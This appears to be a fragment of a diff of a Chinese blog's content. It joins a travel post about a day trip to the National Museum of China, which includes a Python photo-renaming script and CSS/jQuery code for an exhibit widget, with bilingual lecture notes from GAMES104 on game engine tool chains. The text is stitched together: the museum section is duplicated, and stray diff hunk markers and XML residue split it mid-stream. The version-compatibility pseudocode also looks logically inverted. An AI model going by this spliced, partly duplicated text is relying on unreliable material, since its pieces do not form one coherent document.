    ​看一看国博的导航,先冲 B1 楼《古代中国基本陈列》感受一下中华优秀传统文化🥳!

    09:01 古代中国

    五千年华夏

    ​来国博前还把初中历史书翻看了一遍。

    09:03 远古时期

    ——约两百万年前至约公元前二十一世纪

    ​远古时期分为旧石器时代和新石器时代两个阶段。旧石器时代人类使用打制石器、木棒等工具,从事采集、狩猎活动,完成了从直立人、早期智人到晚期智人的进化过程。新石器时代人们使用磨制石器,制作陶器,发明了农业和养畜业,形成了各具特色的地域文化。新石器时代晚期,社会逐步分化,出现了权贵阶层及相应的礼仪制度,在聚落分化的过程中涌现出众多城堡,社会开始向早期国家过渡。

    09:14 夏商西周

    ——约公元前二十一世纪至公元前七七一年

    ​夏、商、西周时期是中国古代早期国家形态的形成与初步发展阶段。这一时期,王权政治得以强化,并不断完善。青铜铸造达到鼎盛,辉煌灿烂。丰富的汉字材料,记录了当时政治、经济与文化面貌。西周统治者推行的礼制,重在彰显、维护等级秩序,对此后中国古代社会的发展产生了深远影响。

    ​我觉得这个时期的中国文明已经发展到了一个比较高的水平,青铜器的精湛程度要比后面很多时期的都要好很多。

    09:35 春秋战国

    ——公元前七七零年至公元前二二一年

    ​春秋战国时期,西周以来的礼制分崩离析,社会结构发生根本性变化;铁器的广泛使用促进了生产力和社会经济的发展;学术思想百花齐放。民族间相互融合,华夏民族主体形成,整个社会在征战兼并中逐步走向统一。

    风卷狂沙,兵临城下。
    气贯长虹,金戈铁马。
    韶华易逝,落尽多少残花,
    且问苍生,谁能一统天下。
    血染万里黄沙,今朝谁家天下?
    醉看几度落霞,泪洒谁家铠甲。
    王于兴师,厉兵秣马。
    与子偕行,修我兵甲。
    啊~与子同仇,啊~且为谁家?
    弑君谋国,图雄争霸。
    万姓流离,望断天涯。
    啊~兆黎皆苦,啊~何处为家?

    ​啊~兆黎皆苦!燕赵儿女,慷慨悲歌。河北保定遭老罪咯😭。这个时候福州还没有建城。

    09:46 秦汉时代

    ——公元前二二一年至公元二二零年

    ​秦汉时期,长期以来诸侯割据纷争的局面结束,专制主义中央集权制在全国范围内建立,中国历史进入大一统时代。新工艺技术的发明和应用,加速了社会经济的发展,丰富了人们的生活,中外文化交流也空前繁荣。我们的祖先在秦汉时期以其卓越的创造力,建树了中国古代文明发展史上的无数丰碑。

    六王毕,四海一。
    蜀山兀,阿房出。

    ​你政哥统一了天下!大肆改革!步子迈大扯到蛋了!很快就倒台了!接着汉朝继承并弘扬了君主专制制度!

    大风起兮云飞扬,
    威加海内兮归故乡,
    安得猛士兮守四方。
    ]]>
    + 这是前言

    ​在北方想有点时间就去北京的各大博物馆开开眼界,第一站——中国国家博物馆!刚好 6.16 是个六级考完还不会有啥事的周末,17:00 提前订票,开冲🤩!


    ​Python 给手机拍摄的图片批量重命名:

    import os

    file_path = r"D:\XXX"
    file_name_list = []

for file in os.listdir(file_path):
    file_name = file.split('_')[-1][:4] + '.jpg'
    count = 1
    while file_name in file_name_list:
        file_name = file.split('_')[-1][:4] + '_' + str(count) + '.jpg'
        count += 1
    file_name_list.append(file_name)
    os.rename(os.path.join(file_path, file), os.path.join(file_path, file_name))

    ​为了便于展示国博的各个“宝贝”,设计一个 Exhibit 类:

    .exhibits-container {
    display: flex;
    margin: 10px 0;
    padding: 10px 5px;
    }

    .exhibits-container.common {
    border: 2px solid var(--border);
    transition: border 0.5s ease-in-out;
    }

    .exhibits-container.rare {
    border: 2px solid #1e6eff;
    background: #1e6eff20;
    }

    .exhibits-container.epic {
    border: 2px solid #8250df;
    background: #8250df20;
    }

    .exhibits-container.legend {
    border: 2px solid #ff9800;
    background: #ff980020;
    }

    .exhibits-container.rare blockquote{
    border-left: 4px solid #1e6eff;
    background: #1e6eff20;
    }

    .exhibits-container.epic blockquote{
    border-left: 4px solid #8250df;
    background: #8250df20;
    }

    .exhibits-container.legend blockquote{
    border-left: 4px solid #ff9800;
    background: #ff980020;
    }

    .reverse {
    flex-direction: row-reverse;
    }

    .exhibits-img-container img {
    max-width: 80%;
    box-shadow: 4px 4px 5px rgba(0, 0, 0, 0.5);
    margin: 0 auto;
    }

    .exhibits-img-container .hidden {
    display: none;
    }

    .exhibits-container-left {
    max-width: 50%;
    justify-content: center;
    }

    .exhibits-container-right {
    width: 100%;
    margin: 0 5px;
    }

    .exhibits-container-right .title {
    margin: 5px auto;
    font-weight: bold;
    font-size: 18px;
    }

    .exhibits-container-right .desc {
    margin: 0 auto;
    padding: 0 10px;
    }

    .exhibits-container-left,
    .exhibits-container-right {
    display: flex;
    flex-direction: column;
    justify-content: center;
    }

    .f-carousel__dots>li:before{
    display: none;
    }

    span.f-carousel__dot {
    color: var(--text-primary);
    transition: color 0.5s ease-in-out;
    }

    .f-button.is-prev {
    transform: translateY(-50%) translateX(-12px) !important;
    }

    .f-button.is-next {
    transform: translateY(-50%) translateX(12px) !important;
    }

    .f-carousel__dots {
    transform: translateY(8px);
    }

    .f-carousel__slide {
    display: flex;
    align-items: center;
    }

    @media screen and (max-width: 660px) {
    .exhibits-container {
    flex-direction: column !important;
    }

    .exhibits-container-left {
    max-width: 100%;
    margin: 0;
    }

    .exhibits-container-right {
    width: auto;
    margin: 10px 5px 5px;
    }

    }
var exhibitsCount = 0;

class Exhibits {
    // ravity: 稀有度('common' / 'rare' / 'epic' / 'legend')
    constructor(ravity, img, title, desc = "", quote = "") {
        this.exhibitsContainer = $('<div>').addClass('exhibits-container').addClass(ravity);
        exhibitsCount += 1;
        if (exhibitsCount % 2 == 0) {
            this.exhibitsContainer.addClass('reverse');
        }
        const exhibitsContainerLeft = $('<div>').addClass('exhibits-container-left');
        const exhibitsImgContainer = $('<div>').addClass('exhibits-img-container');

        if (img.length == 1) {
            exhibitsImgContainer.append($('<img>').attr('no-figcaption', '').attr('src', '/images/loading.webp').attr('data-original', img[0][0]).attr('alt', img[0][1]));
        }
        else {
            const fCarousel = $('<div>').addClass('f-carousel');
            const fCarouselViewport = $('<div>').addClass('f-carousel__viewport');
            fCarousel.append(fCarouselViewport);
            const fCarouselTrack = $('<div>').addClass('f-carousel__track');
            fCarouselViewport.append(fCarouselTrack);

            for (const item of img) {
                let fCarouselSlide = $('<div>').addClass('f-carousel__slide');
                // 与单图分支保持一致,使用 data-original 交由懒加载处理(原文此处重复设置了 src)
                fCarouselSlide.append($('<img>').attr('no-figcaption', '').attr('src', '/images/loading.webp').attr('data-original', item[0]).attr('alt', item[1]));
                fCarouselTrack.append(fCarouselSlide);
            }
            exhibitsImgContainer.append(fCarousel);
            new Carousel(fCarousel.get(0), {});
        }

        exhibitsContainerLeft.append(exhibitsImgContainer);
        const exhibitsContainerRight = $('<div>').addClass('exhibits-container-right');
        const titlePara = $('<p>').addClass('title').text(title);

        exhibitsContainerRight.append(titlePara);

        if (desc.length > 0) {
            const descPara = $('<p>').addClass('desc').text(desc);
            exhibitsContainerRight.append(descPara);
        }

        if (quote.length > 0) {
            const quotePara = $('<blockquote>').append($('<p>').text(quote));
            exhibitsContainerRight.append(quotePara);
        }

        this.exhibitsContainer.append(exhibitsContainerLeft).append(exhibitsContainerRight);
    }

    render() {
        $(document.currentScript).before(this.exhibitsContainer);
    }
}

    ​使用方法示例(用到了轮播插件 Carousel | Fancyapps UI - Robust JavaScript UI Component Library,必须提前引入):

<script>
    new Exhibits('common', [
        ['国博/1-远古时期/0904_2.webp', '野兽残骸'],
        ['国博/1-远古时期/0904_3.webp', '野兽残骸'],
        ['国博/1-远古时期/0904_4.webp', '野兽残骸'],
    ], '野兽残骸',
        '​祖先们与野兽相伴。',
    ).render();
</script>

    ​参考《炉石传说》的稀有度,依据“宝贝”的名气及其做工的精湛程度,按主观臆断给这些“宝贝”分为“普通”、“稀有”、“史诗”和“传说”四个等级😍!如有异议,算我没文化。


    ​国博里的“宝贝”太多了,短时间内不能把这些东西都讲清楚。这个系列应该会不断维护并完善其内容。

    这是正文

    我出发了

    05:56 每日任务

    每日任务

    ​夏天到了,醒得越来越早了……

    ​大早上 5 点 40 左右起床下楼,宿管阿姨居然已经提前把宿舍门开了。吃喝拉撒完,考虑到中午在国博进餐不便,去食堂提前把肉夹馍买好了。肉夹馍阿姨跟我说这是见到我的第 4 个学期了,居然才知道我是个研究生😇。

    ​再去实验室门口完成一下每日任务,然后乘公交去保定东站!

    06:48 保定东站

    本学期第二次拜访

    ​之前怕起不来赶不上早发的车,买的 G6716,08:19 保定东 - 08:50 北京西,¥63。事实证明是可以在宿管阿姨开门后,在 7 点以前赶到高铁站的。于是改签 G6720,07:03 保定东 - 07:24 高碑店东 - 07:53 北京西,¥57。这样就可以赶在开门前到国博了,除去退票费还退了 4 块钱😍!

    06:59 逆向高铁

    看来走的跟上次不是一个道

    ​这次上车方向居然跟上次进京方向相反……

    07:17 燕南赵北

    高碑店东

    ​高碑店东站广场上的四个大字。啊,河北!大河之北,燕南赵北。乱世兵家必争之地,盛世一大冤种😭。

    07:42 永定河旁

    老北京园博园

    ​西边进京。永定河旁出现了北京园博园里的各色奇异建筑。

    07:49 北京电塔

    老北京电视塔

    ​这个电视塔长得跟天津的几乎一模一样,但是比天津的矮一些。

    07:50 北京西站

    老北京雾蒙蒙

    ​北京西站上面还有个老北京特色建筑。

    ​恭喜!今天早上有北京特产可爱小雾霾!

    探索国博

    08:27 开始排队

    老北京排长队

    ​下车。乘坐地铁 9 号线北京西站-军事博物馆-地铁 1 号线天安门东,¥4。

    ​9 点开门的国博于 8 点半就已经排起了长队。

    这么多人?
    这就是北京!

    老北京天安门

    ​看到天安门了,来跟之前一直很想去看天安门的爱国凡哥问个好!

    😭凡哥
    给你看天安门
    真快啊

    侧面看国博

    ​排队过程中来一张侧面的国博。

    09:00 成功入场

    国博导航

    ​经过一次近乎机场安检级别的安检,终于进场了!

    ​看一看国博的导航,先冲 B1 楼《古代中国基本陈列》感受一下中华优秀传统文化🥳!

    09:01 古代中国

    五千年华夏

    ​来国博前还把初中历史书翻看了一遍。

    09:03 远古时期

    ——约两百万年前至约公元前二十一世纪

    ​远古时期分为旧石器时代和新石器时代两个阶段。旧石器时代人类使用打制石器、木棒等工具,从事采集、狩猎活动,完成了从直立人、早期智人到晚期智人的进化过程。新石器时代人们使用磨制石器,制作陶器,发明了农业和养畜业,形成了各具特色的地域文化。新石器时代晚期,社会逐步分化,出现了权贵阶层及相应的礼仪制度,在聚落分化的过程中涌现出众多城堡,社会开始向早期国家过渡。

    09:14 夏商西周

    ——约公元前二十一世纪至公元前七七一年

    ​夏、商、西周时期是中国古代早期国家形态的形成与初步发展阶段。这一时期,王权政治得以强化,并不断完善。青铜铸造达到鼎盛,辉煌灿烂。丰富的汉字材料,记录了当时政治、经济与文化面貌。西周统治者推行的礼制,重在彰显、维护等级秩序,对此后中国古代社会的发展产生了深远影响。

    ​我觉得这个时期的中国文明已经发展到了一个比较高的水平,青铜器的精湛程度要比后面很多时期的都要好很多。

    09:35 春秋战国

    ——公元前七七零年至公元前二二一年

    ​春秋战国时期,西周以来的礼制分崩离析,社会结构发生根本性变化;铁器的广泛使用促进了生产力和社会经济的发展;学术思想百花齐放。民族间相互融合,华夏民族主体形成,整个社会在征战兼并中逐步走向统一。

    风卷狂沙,兵临城下。
    气贯长虹,金戈铁马。
    韶华易逝,落尽多少残花,
    且问苍生,谁能一统天下。
    血染万里黄沙,今朝谁家天下?
    醉看几度落霞,泪洒谁家铠甲。
    王于兴师,厉兵秣马。
    与子偕行,修我兵甲。
    啊~与子同仇,啊~且为谁家?
    弑君谋国,图雄争霸。
    万姓流离,望断天涯。
    啊~兆黎皆苦,啊~何处为家?

    ​啊~兆黎皆苦!燕赵儿女,慷慨悲歌。河北保定遭老罪咯😭。这个时候福州还没有建城。

    09:46 秦汉时代

    ——公元前二二一年至公元二二零年

    ​秦汉时期,长期以来诸侯割据纷争的局面结束,专制主义中央集权制在全国范围内建立,中国历史进入大一统时代。新工艺技术的发明和应用,加速了社会经济的发展,丰富了人们的生活,中外文化交流也空前繁荣。我们的祖先在秦汉时期以其卓越的创造力,建树了中国古代文明发展史上的无数丰碑。

    六王毕,四海一。
    蜀山兀,阿房出。

    ​你政哥统一了天下!大肆改革!步子迈大扯到蛋了!很快就倒台了!接着汉朝继承并弘扬了君主专制制度!

    大风起兮云飞扬,
    威加海内兮归故乡,
    安得猛士兮守四方。
    ]]>
    @@ -1701,7 +1701,7 @@ /posts/GAMES104-Tool%20Chains/ - 资源

    课程

    第十三节:引擎工具链基础

    Outline of Tool Chains

    Foundation of Tool Chains

    • What is Game Engine Tool Chains

      什么是游戏引擎工具链

    • Complicated Tool GUI

      复杂的工具 GUI

• How to Load Asset - Deserialization

      如何加载资产-反序列化

• How to Make Robust Tools

      如何制作强大的工具

    • How to Make Tool Chain

      如何制作工具链

    • What You See is What You Get

      所见即所得

    • One More Thing - Plugin

      还有一件事 - 插件

    Applications & Advanced Topic

    • Common Game Production Workflow

      常见的游戏制作工作流程

    • Common Editors

  常见的编辑器

    • Reflection

      反射

    • Collaborative Editing

      协作编辑

    What is Game Engine Tool Chain

    ​什么是游戏引擎工具链?

    Layer Between Users and Engine Runtime

    ​用户和引擎运行时之间的层。让用户更好地操作游戏引擎写游戏。

    webp

    Bridge Between DCC Tools and Game Engine

    ​DCC 工具和游戏引擎之间的桥梁

    webp

    ​让游戏引擎能够读取用户使用各种工具创造的艺术资源。

    Let Huge Different Mindset Users Work Together

    ​让不同心态的用户共同合作

    webp

    For Designers

    对于设计师

• Iterate the gameplay quickly

      快速迭代游戏玩法

    • Implement game logic prototype quickly even without programming

      无需编程即可快速实现游戏逻辑原型

    • Edit massive data easily

      轻松编辑海量数据

    For Artists

    对于艺术家

    • The quality of the result

      结果质量

    • Convenient workflow

      便捷的工作流程

    • What you see is what you get (WYSIWYG)

      所见即所得 (WYSIWYG)

    Complicated Tool GUI

    ​复杂的工具 GUI

Graphical User Interface (GUI)

​图形用户界面 (GUI)

    webp

GUI is getting more and more complex

    ​GUI 越来越复杂

    • Fast iteration

      快速迭代

    • Separation of design and implementation

      设计和实现分离

    • Reusability

      可重用性

    Immediate Mode

    webp

    • The client calls cause rendering of graphics objects to the display.

      客户端调用导致图形对象渲染到显示器。

    • the data to describe rendering primitives is inserted frame by frame directly from the client into a command list.

      描述渲染图元的数据直接从客户端逐帧插入到命令列表中

ImGui::DrawButton("hello", 12, 24, &callback_func);

    webp

    Characteristic

    ​特点

    • Lightweight

      轻量级

    • Procedural programming

      程序化编程

    • Widgets don’t maintain any data or state

      小部件不维护任何数据或状态

    Pros

    ​优点

    • Straightforward

      直接

    • Simple

      简单

    • Quick prototype

      快速原型

    Cons

    ​缺点

    • Poor scalability

      可扩展性差

    • Poor performance

      性能差

    • Poor maintainability

      可维护性差

    Examples

    ​示例

    • Unity UGUI
• Omniverse GUI
• Piccolo GUI

    Retained Mode

    ​保留模式

    webp

• The graphics library, instead of the client, retains the scene to be rendered.

      图形库,而不是客户端保留要渲染的场景。

• Calls from the client into the graphics library do not directly cause actual rendering, but make use of extensive indirection to resources managed by the graphics library.

      客户端调用图形库不会直接导致实际渲染,而是利用图形库管理的大量间接资源。

HorizontalLayout layout = new HorizontalLayout();
Button button = new Button();
button.setText("Hello!");
button.setWidth(12);
button.setHeight(24);
button.setCallback(&callback_func);
layout.Add(button);

    webp

    Characteristic

    ​特点

    • Object-oriented

      面向对象

    • Widgets contain their own state and data

      小部件包含自己的状态和数据

      • Draw widgets as needed

        根据需要绘制小部件

      • Complicated effects (animation et.al.)

        复杂效果(动画等)

    Pros

    ​优点

    • High scalability

      高可扩展性

    • High performance

      高性能

    • High maintainability

      高可维护性

    Cons

    ​缺点

    • Complex for developers

      对开发人员来说很复杂

      • Message queue / callbacks

        消息队列 / 回调

      • Synchronization between GUI and application

        GUI 和应用程序之间的同步

    Design Pattern-MVC

    webp

    ​用户借助 Controller 操作 Model,Model 更新 View 给用户看。

    Invented by Trygve Reenskaug in 1978, to bridge the gap between the human user’s mental model and the digital model that exists in the computer.

    ​由 Trygve Reenskaug 于 1978 年发明,用于弥合人类用户的心理模型与计算机中存在的数字模型之间的差距。

Model: The central component of the pattern, responsible for managing the data of the application.

    模型:模式的核心组件,负责管理应用程序的数据。

    View: Any representation of information such as a chart, diagram or table.

    视图:任何信息表示形式,例如图表、图解或表格。

    Controller: Accepts input and converts it to commands for the model or view.

    控制器:接受输入并将其转换为模型或视图的命令。

    Design Pattern-MVP

    The evolution of the MVC design pattern, wherein the controller is replaced by the presenter.

    ​MVC 设计模式的演变,其中控制器被演示者取代。

    webp

    ​不同于 MVC,这次使用双向箭头。

    Model: An interface defining the data to be displayed or otherwise acted upon in the user interface.

    模型:定义要在用户界面中显示或以其他方式执行的数据的接口。

View: A passive interface that displays data (the model) and routes user commands (events) to the presenter to act upon that data.

    视图:显示数据(模型)并将用户命令(事件)路由到演示者以对该数据执行操作的被动接口。

Presenter: Acts upon the model and the view. It retrieves data from repositories (the model), and formats it for display in the view.

    演示者:对模型和视图执行操作。它从存储库(模型)检索数据,并将其格式化以在视图中显示。

    Design Pattern-MVVM

    A variation of Model / View / Controller (MVC)

    webp

In MVVM, View is the responsibility of a designer rather than a classic developer.

    ​在 MVVM 中,View 是设计师而非传统开发人员的职责。

The designer is generally a more graphical, artistic-focused person, and does less classic coding than a traditional developer.

    ​设计师通常更注重图形和艺术,与传统开发人员相比,他们较少进行传统编码。

    webp

View: built using a WYSIWYG tool such as Dreamweaver or VS Blend and saved as html/xaml; view state that MVC encodes in its View classes is not easy to represent.

    View:使用 Dreamweaver、VS Blend 等所见即所得工具并保存为 html/xaml,MVC 在其 View 类中编码的视图状态不易表示。

    Binding: bind View Data to the Model ,no more code in View classes.

    Binding:将 View 数据绑定到 Model,View 类中不再有代码。

ViewModel-Model of View: the Model is very likely to have data types that cannot be mapped directly to controls; the ViewModel contains data transformers that convert Model types into View types.

    ViewModel-View 的模型:Model 很可能具有无法直接映射到控件的数据类型,ViewMlodel 包含将 Model 类型转换为 View 类型的数据转换器。


    Pros

    ​优点

    • Independent development

      独立开发

    • Easy to maintain and test

      易于维护和测试

    • Easy to reuse components

      易于重用组件

    Cons

    ​缺点

    • For simple UI, MVVM can be overkill

      对于简单的 UI,MVVM 可能有点过头了

    • Data-binding is declarative and harder to debug

      数据绑定是声明性的,更难调试

    Serialization and Deserialization

    ​序列化与反序列化

    webp

Serialization is the process of translating a data structure or object state into a format that can be stored (for example, in a file or memory data buffer) or transmitted (for example, over a computer network) and reconstructed later.

​序列化是将数据结构或对象状态转换为可存储(例如,在文件或内存数据缓冲区中)或传输(例如,通过计算机网络)并在稍后重建的格式的过程。

Deserialization is the opposite operation, extracting a data structure from a series of bytes.

    反序列化是相反的操作,从一系列字节中提取数据结构。
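As a deliberately minimal C++ illustration (a plain struct packed into a byte stream and reconstructed; real engines also handle versioning, endianness and references, all covered below):

#include <cstdint>
#include <cstring>
#include <vector>

// A trivially copyable struct can be serialized by copying its bytes.
struct Transform {
    float x, y, z;
};

std::vector<std::uint8_t> Serialize(const Transform& t) {
    std::vector<std::uint8_t> bytes(sizeof(Transform));
    std::memcpy(bytes.data(), &t, sizeof(Transform));  // object -> byte stream
    return bytes;
}

Transform Deserialize(const std::vector<std::uint8_t>& bytes) {
    Transform t{};
    std::memcpy(&t, bytes.data(), sizeof(Transform));  // byte stream -> object
    return t;
}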

    Text Files

    webp

    ​使用文本文档设计的对象数据结构。

    • Save data as text files
    • Example: TXT, Json, YAML, XML…
    • Can read by common text editors

    Engine applications:

    • Unity Editor(optional): subset of YAML
    • Piccolo: Json
    • Cryengine: XML/Json (optional)

    Binary Files

    webp

    • Save data as bytes stream

      将数据保存为字节流

    • Need additional tools for read/write

      需要额外的读/写工具

    • Example: UAsset, FBX Binary

      示例:UAsset、FBX 二进制

    Engine applications:

    • Unity Runtime, Unity Editor (optional 可选)
    • CryEngine (optional 可选)
    • Unreal: UAsset

    Storage Comparison -Text vs. Binary

    ​存储比较 - 文本与二进制

    webp

    ​文本可读性好但是占用空间大,读取速度慢。二进制体积小,性能好但是可读性差,不便于调试。

    Asset Data Repeatance

    ​资源数据重复

    webp

The meshes in the red boxes are redundant data.

    ​红框内的网格是冗余数据。

    How do game developers solve the problem?

    ​游戏开发者如何解决这个问题?

    Asset Reference

    ​资产引用

    webp

    Assets Reference is a way to separate redundant data into asset files and complete association by establishing reference relationships.

    ​资产引用是一种将冗余数据分离到资产文件中,通过建立引用关系完成关联的方式。

    Object instance in Scene

    ​场景中的对象实例

    webp

    Data instance is a way to create a parent data that you can use as a base to make a wide variety of different children and can also be used directly.

    数据实例是一种创建父数据的方法,您可以将其用作基础来制作各种不同的子数据,也可以直接使用。

    Object instance Variance

    ​对象实例变化

    webp

    How to change the texture of Ground1 from stone to castle stone?

    ​如何将 Ground1 的纹理从石头更改为城堡石头?

    Build Variance by Copying

    ​通过复制构建差异

    webp

    Intuitive way: make a copy of instance data, modify the copy

    ​直观的方式:复制实例数据,修改副本

• adds lots of redundant data

      添加大量冗余数据

    Build Variance by Data Inheritance

    ​通过数据继承构建差异

    webp

Data Inheritance: inherit the data of the parent object and allow overriding assignments to the data defined in its data structure.

    数据继承:继承继承对象的数据并允许覆盖其数据结构中定义的数据的分配。

    How to Load Asset-Deserialization

    ​如何加载资产反序列化

    Parse Asset File

    ​解析资产文件

    webp

How to know how to instantiate A or its fields?——Store the types of A and its fields

    ​如何知道实例化 A 或字段?——存储 A 和字段的类型

    Build Key-Type-Value Pair Tree

    ​构建键-类型-值对树

    webp

    Binary vs. Text

    ​二进制与文本

    webp

    Where to store the objects and fields type?

    ​将对象和字段类型存储在哪里?

    • Text: store in asset

      文本:存储在资产中

    • Binary: store in a table

      二进制:存储在表中

    Endianness

    ​不同的硬件架构有不同的字节序。

    webp

    Big Endian: begin with most significant byte end with least significant byte

    ​大端序:以最高有效字节开始,以最低有效字节结束

    Little Endian: begin with least significant byte end with most significant byte

    ​小端序:以最低有效字节开始,以最高有效字节结束

    Endianness vary among different processors

    ​不同处理器的字节序各不相同

Processor | Endianness
PowerPC (PPC) | Big Endian
Sun Sparc | Big Endian
IBM S/390 | Big Endian
Intel x86 (32 bit) | Little Endian
Intel x86_64 (64 bit) | Little Endian
ARM | Bi (Big / Little) Endian
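A common way to detect the host endianness at runtime is to store a known multi-byte value and inspect which byte sits at the lowest address (a minimal sketch, independent of any engine):

#include <cstdint>
#include <cstring>

bool IsLittleEndian() {
    const std::uint16_t value = 0x0001;
    std::uint8_t first = 0;
    std::memcpy(&first, &value, 1);   // read the lowest-addressed byte
    return first == 0x01;             // little endian stores the LSB first
}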

    Unreal:

/**
 * Returns true if data larger than 1 byte should be swapped to deal with endian mismatches.
 * 如果应交换大于 1 字节的数据来处理字节序不匹配问题,则返回 true。
 */
FORCEINLINE bool IsByteSwapping()
{
#if PLATFORM_LITTLE_ENDIAN
    bool SwapBytes = ArForceByteSwapping;
#else
    bool SwapBytes = this->IsPersistent();
#endif
    return SwapBytes;
}

    Asset Version Compatibility

    ​资源版本兼容性

    webp

    Add or Remove Field

    ​添加或删除字段

    origin class:

class GameObject
{
private:
    GUID guid;
    string name;
    Transform transform;
};

    old data:

{
    "guid": "092xtwg2u4ik1359",
    "name": "Alice",
    "transform": {
        "position": {
            "x": 0,
            "y": 0,
            "z": -0.1
        },
        "rotate": {},
        "scale": {
            "x": 1,
            "y": 1,
            "z": 1
        }
    }
}

    updated class 1

class GameObject
{
private:
    GUID guid;
    string name;
};

    updated class 2

class GameObject
{
private:
    GUID guid;
    string name;
    Transform transform;
    BoundingBox bbox;
};

    Solve Compatibility by Version Hardcode

    ​通过版本硬编码解决兼容性问题

    Unreal: add version to asset

    ​Unreal:将版本添加到资产

    • Load asset: check if field exists then load data

      加载资产:检查字段是否存在,然后加载数据

    • Save asset: write all data to asset file

      保存资产:将所有数据写入资产文件

class GameObject:
    int x = default;
    float y = default;
    bool z = default; // new field

function Deserialize(data):
    x = data.GetValue<int>("x");
    y = data.GetValue<float>("y");
    if (GetCurrentVersion() >= data.version) {
        z = data.GetValue<bool>("z");
    }

function Serialize(data):
    data.SetValue<int>("x", x);
    data.SetValue<float>("y", y);
    data.SetValue<bool>("z", z);
    data.UpdateVersion(GetCurrentVersion());

    Solve Compatibility by Field UID

    ​通过字段 UID 解决兼容性问题

    Google protocol buffers:

    ​Google 协议缓冲区:

    ​unique number for field

    ​字段的唯一编号

    • Every field has a unique number, never change the number.

      每个字段都有一个唯一编号,永远不要更改该编号。

    • Serialization:

      序列化:

  1. For every field, generate a “key” (fixed size) according to its field number and type.

        对于每个字段,根据其字段编号和类型生成一个“键”(固定大小)。

      2. Store field data with key, key is stored in the first few bytes

        使用键存储字段数据,键存储在前几个字节中

    • Deserialization:

      反序列化:

  1. Field not in schema but in data: the key would not be recognized, so skip the field.

        字段不在架构中但在数据中:键将无法识别,跳过该字段。

      2. Field in schema but not in data: set default value.

        字段在架构中但不在数据中:设置默认值。

message PrefabObjectBinary {
    string guid = 1;
    string file_name = 2;
    repeated string game_object_guid_list = 3;
}

    webp
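For reference, the “key” described above is what the Protocol Buffers wire format calls a tag: the field number shifted left by three bits, combined with a 3-bit wire type. A one-line C++ sketch:

#include <cstdint>

// Protocol Buffers wire-format tag: field number plus 3-bit wire type.
// Because the field number is baked into every stored key, renumbering
// a field breaks compatibility with previously serialized data.
std::uint32_t MakeTag(std::uint32_t field_number, std::uint32_t wire_type) {
    return (field_number << 3) | wire_type;  // e.g. guid (=1), type 2 -> 0x0A
}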

How to Make Robust Tools

​如何制作鲁棒的工具?

    • Undo & Redo

      要有 Ctrl + Z 和 Ctrl + Y 的功能

    • Crash Recovery

      程序崩溃时能够回档

    Command

    webp

• Abstract all user operations into atomic commands which can be invoked, revoked, serialized and deserialized.

      将所有用户操作抽象为可以调用、撤销、序列化、反序列化的原子命令。

    Command-Definition

• ICommand<TData> provides a basic abstraction of the command.

      ICommand<TData> 提供命令的基本抽象。

• Every system (which wants to support undo/redo/crash recovery…) needs to implement the system-related commands inherited from ICommand<TData>.

      每个系统(想要支持撤消/重做/崩溃恢复…)都需要实现从 lCommand<TData> 继承的系统相关命令。

public interface ICommand<TData>
{
    long UID { get; set; }
    TData Data { get; set; }
    void Invoke();
    void Revoke();
    byte[] Serialize();
    void Deserialize(byte[] data);
}

    Command-UID

Commands need to strictly follow the sequence when recovering from disk

    ​从磁盘恢复时命令需要严格遵循顺序

    • Monotonic increase over time

      随时间单调增加

    • Unique identification

      唯一标识

    Command Serialize and Deserialize

    ​命令序列化和反序列化

    • Provide functions to serialize command instance to data and deserialize data to command instance.

      提供将命令实例序列化为数据和将数据反序列化为命令实例的函数。

• The TData type needs to provide serialize and deserialize interfaces.

      TData 类型需要提供序列化和反序列化接口。

    Three key Commands

    ​三个关键命令

    • Add

      • Data: Usually data is a copy of the runtime instance

        通常数据是运行时实例的副本

      • Invoke: Create a runtime instance with data

        使用数据创建运行时实例

      • Revoke: Delete the runtime instance

        删除运行时实例

    • Delete

      • Data: Usually data is a copy of the runtime instance

        通常数据是运行时实例的副本

      • Invoke: Delete the runtime instance

        删除运行时实例

      • Revoke: Create a runtime instance with data

        使用数据创建运行时实例

    • Update

      • Data: Usually data is the old and new values of the modified properties of the runtime instance andtheir property names

        通常数据是运行时实例修改属性的新旧值及其属性名称

      • Invoke: Set the runtime instance property to the new value

        将运行时实例属性设置为新值

      • Revoke: Set the runtime instance property to the old value

        将运行时实例属性设置为旧值
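As a sketch of the Update case in C++ (the interface above is C#; all names here are illustrative, not from any engine):

#include <functional>
#include <string>

// Illustrative counterpart of the Update command described above: it
// stores the property name plus old/new values, so Invoke/Revoke can
// both be replayed, including after crash recovery.
struct UpdateFloatCommand {
    long        uid = 0;               // monotonically increasing unique id
    std::string property;              // e.g. "intensity"
    float       old_value = 0.0f;
    float       new_value = 0.0f;
    std::function<void(const std::string&, float)> setter;

    void Invoke() { setter(property, new_value); }  // redo: apply new value
    void Revoke() { setter(property, old_value); }  // undo: restore old value
};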

    How to Make Tool Chain

    Various Tools for Different Users

    webp

• Different views for different tools

      不同工具有不同的视图

• Each tool has its own data structure

      每个工具都有其所有者数据结构

    • Same data may have different view for different user

      同一数据可能对不同用户有不同的视图

Develop All Tools Separately?

    ​单独开发所有工具?

    Simplest Way

    ​最简单的方法

    • No Scalability

      没有可扩展性

• No maintainability

      没有可维护性

    Find Common Building Blocks

    ​寻找共同的构建块

    webp

    Any complex structure is made up of simple structures, we just need a standard language to describe it.

    ​任何复杂的结构都是由简单的结构组成的,我们只需要一种标准的语言来描述它。

    Schema-A Description Structure

​Schema——一种描述结构

    webp

    A data schema is the formal description of the structures your system is working with.

数据模式是对系统正在使用的结构的正式描述。

    Standardizing the world description language

    ​标准化世界描述语言

    • Unified the data processor

      统一数据处理器

    • Normalized data between different tools

      不同工具之间的标准化数据

• Ability to automatically generate standardized UI

      能够自动生成标准化 UI

Schema-Basic Elements

    ​Schema-基本元素

    webp

    Abstraction of the basic building block of the world

    ​世界基本构成块的抽象

    • Atomic Types: Int, Float, Double …

      原子类型:Int、Float、Double…

    • Class Type: Use atomic types to present complex data structure

      类类型:使用原子类型呈现复杂的数据结构

    • Containers: Array, Map

      容器:Array、Map

    Schema-Inheritance

    Abstraction of the inheritance relationship of the world

    ​世界继承关系的抽象

    webp

class A { /*...*/ };
class B : public A { /*...*/ };
class C : public A { /*...*/ };

    Schema-Data Reference

    Abstract of the reference relationship of the world

    ​世界引用关系的抽象

    webp

    In the code, we need to read the data through the file path and instantiate it into the corresponding file class.

    ​在代码中我们需要通过文件路径读取数据,并实例化成对应的文件类。

    Schema - 2 Definition Ways

    webp

    Standalone schema definition file

    ​独立的架构定义文件

    Pros

    ​优点

    • Comprehension easily

      易于理解

    • Low coupling

      低耦合

    Cons

    ​缺点

